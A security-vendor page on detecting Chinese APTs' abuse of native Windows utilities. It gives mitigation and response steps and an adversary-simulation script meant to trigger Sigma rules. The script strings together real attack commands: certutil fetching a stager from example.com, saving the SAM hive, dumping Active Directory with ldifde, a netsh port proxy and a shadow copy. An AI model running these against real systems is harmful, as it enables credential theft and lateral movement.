SOC Prime Bias: Critical

18 May 2026 18:20 UTC
newspaper icon hackers-arise.com

Hunting Chinese APTs Abusing Native Windows Tools

Author Photo
SOC Prime Team linkedin icon Follow
Hunting Chinese APTs Abusing Native Windows Tools
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query


Summary

The article explores how Chinese advanced persistent threat groups abuse built-in Windows utilities, often referred to as LOLBAS, to perform reconnaissance, steal credentials, and move laterally across environments while blending into routine administrative activity.

Investigation

It highlights specific command-line use of native tools such as nltest, certutil, netsh, reg.exe, vssadmin, and others, and points to Sigma rules that can help detect these techniques within SIEM platforms.

Mitigation

Defenders are encouraged to monitor suspicious execution of native Windows binaries, enforce least-privilege access controls, audit registry modifications, and deploy detection logic based on the referenced Sigma patterns.

Response

When suspicious LOLBAS activity is identified, security teams should trigger an alert, isolate the affected host, collect relevant logs, confirm whether credential dumping or lateral movement occurred, and perform forensic analysis on any resulting artifacts.

Attack Flow

We are still updating this part. Sign up to get notified

Notify Me

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

  • Attack Narrative & Commands:

    An attacker who has gained initial foothold on a domain‑joined Windows workstation seeks to map the domain, enumerate privileged groups, and harvest credential material using only native binaries to avoid triggering traditional AV signatures. The steps are:

    1. Enumerate Domain Controllers: nltest /dclist:domain.local – reveals all DCs in the target domain.
    2. Collect System Information: systeminfo – gathers OS version, patches, and hardware details.
    3. List Running Processes: tasklist – provides insight into privileged services.
    4. Query Windows Event Logs for Logon Events: Get-EventLog -LogName Security -InstanceId 4624 (PowerShell) – extracts successful logon events.
    5. Download a staged payload: certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe – uses certutil to bypass web‑filtering.
    6. Enumerate Local Administrators: net localgroup administrators – identifies privileged accounts.
    7. Export SAM Registry Hive: reg.exe save hklmsam C:sam.save – attempts to dump password hashes.
    8. Create Port Proxy for Lateral Movement: netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389 – prepares a tunnel.
    9. Enumerate DNS Records: dnscmd . /enumrecords /zone – discovers internal DNS zones.
    10. Export AD objects via LDIFDE: ldifde.exe -f C:WindowsTempad_dump.txt -p subtree – pulls directory data.
    11. Create a Volume Shadow Copy: vssadmin create shadow /for=C: – enables file‑level access to locked files.

    Each command exactly matches one of the “CommandLine|contains” strings in the Sigma rule, ensuring the rule fires on the resulting process‑creation events.

  • Regression Test Script: (PowerShell – self‑contained, requires admin rights)

    # TC-20260518-A7B9K – Simulate adversary usage of native Windows utilities
# NOTE: Run on a domain‑joined Windows host with admin privileges.

# 1. Domain controller enumeration
nltest /dclist:domain.local

# 2. System information
systeminfo

# 3. List processes
tasklist

# 4. Security event log extraction (PowerShell)
Get-EventLog -LogName security -InstanceId 4624

# 5. Download staged payload via certutil
certutil -urlcache -split -f https://example.com/stager.exe C:WindowsTempstager.exe

# 6. Enumerate local administrators
net localgroup administrators

# 7. Export SAM hive
reg.exe save hklmsam C:sam.save

# 8. Configure port proxy
netsh interface portproxy add v4tov4 listenport=4444 connectaddress=10.0.0.5 connectport=3389

# 9. DNS zone enumeration
dnscmd . /enumrecords /zone

# 10. Export AD data via LDIFDE
ldifde.exe -f C:WindowsTempad_dump.txt -p subtree

# 11. Create a volume shadow copy
vssadmin create shadow /for=C:

  • Cleanup Commands:

    # Remove files created during the simulation
Remove-Item -Path C:WindowsTempstager.exe -ErrorAction SilentlyContinue
Remove-Item -Path C:sam.save -ErrorAction SilentlyContinue
Remove-Item -Path C:WindowsTempad_dump.txt -ErrorAction SilentlyContinue

# Delete the portproxy rule
netsh interface portproxy delete v4tov4 listenport=4444

# Delete the shadow copy (optional – requires shadow copy ID)
# vssadmin delete shadows /for=C: /all /quiet

Join SOC Prime's Detection as Code platform to improve visibility into threats most relevant to your business. To help you get started and drive immediate value, book a meeting now with SOC Prime experts.

Join for Free